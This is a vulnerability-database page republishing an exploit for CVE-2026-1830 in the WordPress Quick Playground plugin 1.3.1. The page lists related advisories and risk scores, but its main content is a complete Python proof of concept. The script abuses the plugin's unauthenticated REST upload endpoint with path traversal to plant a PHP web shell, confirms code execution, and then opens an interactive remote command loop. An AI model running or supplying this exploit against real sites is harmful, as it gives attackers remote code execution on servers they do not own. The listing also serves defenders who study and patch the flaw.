Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ WordPress Quick Playground 1.3.1 Shell Upload

๐Ÿ—“๏ธย 29 May 2026ย 00:00:00Reported byย cardosourceTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 53ย Views

Unauthenticated remote code execution via WordPress Quick Playground plugin 1.3.1 REST upload endpoint.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-1830
9 Apr 202603:25
โ€“attackerkb
Circl		CVE-2026-1830
8 Apr 202620:16
โ€“circl
CNNVD		WordPress plugin Quick Playground ๅฎ‰ๅ…จๆผๆดž
9 Apr 202600:00
โ€“cnnvd
CVE		CVE-2026-1830
9 Apr 202603:25
โ€“cve
Cvelist		CVE-2026-1830 Quick Playground <= 1.3.1 - Missing Authorization to Unauthenticated Arbitrary File Upload
9 Apr 202603:25
โ€“cvelist
Exploit DB		Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution
29 May 202600:00
โ€“exploitdb
EUVD		EUVD-2026-20843
9 Apr 202606:30
โ€“euvd
NVD		CVE-2026-1830
9 Apr 202605:16
โ€“nvd
Packet Storm		๐Ÿ“„ Quick Playground for WordPress 1.3.1 Shell Upload
9 Jun 202600:00
โ€“packetstorm
Patchstack		WordPress Quick Playground plugin <= 1.3.1 - Missing Authorization to Unauthenticated Arbitrary File Upload vulnerability
10 Apr 202609:26
โ€“patchstack
Rows per page
# Exploit Title: Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution 
    # Google Dork: N/A
    # Date: 2026-05-22
    # Exploit Author: cardosource
    # Vendor Homepage: https://quickplayground.com
    # Software Link: https://downloads.wordpress.org/plugin/quick-playground.1.3.1.zip
    # Version: <= 1.3.1
    # Tested on: Docker / Debian / Apache / PHP 8.2 / WordPress 6.x
    # CVE: CVE-2026-1830
    #
    # Description:
    #
    # The Quick Playground plugin exposes a REST API endpoint:
    #
    #   /wp-json/quickplayground/v1/upload_image/{profile}
    #
    # The endpoint validates uploads exclusively through a sync_code value
    # without requiring authenticated WordPress sessions or capability checks.
    #
    # Vulnerable code:
    #
    #   if($code == $sync_code)
    #       return true;
    #
    # If a valid sync_code is known, weak, reused, leaked, or predictable,
    # an attacker can upload arbitrary files using path traversal sequences.
    #
    # This PoC demonstrates arbitrary PHP file upload resulting in remote
    # command execution in a controlled local lab environment.
    #
    # LAB SETUP:
    #
    # docker exec -it <container> \
    #   wp option update qckply_sync_code_default 'exploit123' --allow-root
    #
    # Usage:
    #
    # python3 poc.py
    #
    import requests
    import base64
    import random
    import string
    import re
    
    TARGET = "http://localhost:8080"
    SYNC_CODE = "exploit123"
    PROFILE = "default"
    
    s = requests.Session()
    s.headers.update({
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/json"
    })
    
    name = ''.join(random.choices(string.ascii_lowercase, k=8)) + ".php"
    
    shell = b'<?php if(isset($_GET["cmd"])){echo "<pre>";system($_GET["cmd"]);echo "</pre>";} ?>'
    
    payload = {
        "sync_code": SYNC_CODE,
        "filename": f"../../../{name}",
        "base64": base64.b64encode(shell).decode()
    }
    
    url = f"{TARGET}/wp-json/quickplayground/v1/upload_image/{PROFILE}"
    
    print("[-] Sending webshell...")
    r = s.post(url, json=payload, timeout=15)
    
    try:
        msg = r.json().get("message", "")
    except:
        print("[-] Invalid server response")
        exit()
    
    if "saving to" not in msg:
        print("[-] Upload failed")
        print(r.text[:300])
        exit()
    
    print("[-] Checking execution...")
    
    shell_url = f"{TARGET}/{name}"
    
    r = s.get(shell_url, params={"cmd": "id"}, timeout=10)
    
    m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)
    
    if not m:
        print("[-] Shell not responding")
        exit()
    
    print("[+] RCE CONFIRMED!")
    print(f"[+] Shell: {shell_url}?cmd=command")
    print(f"[+] User: {m.group(1).strip()}\n")
    
    while True:
        cmd = input("$ ").strip()
    
        if cmd == "exit":
            break
    
        if not cmd:
            continue
    
        r = s.get(shell_url, params={"cmd": cmd}, timeout=30)
    
        m = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)
    
        if m:
            print(m.group(1).strip())

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.02288
SSVC
WordPressQuick Playgroundremote code executionupload image endpointauthentication bypassrest interfacesynchronization codevulnerability
53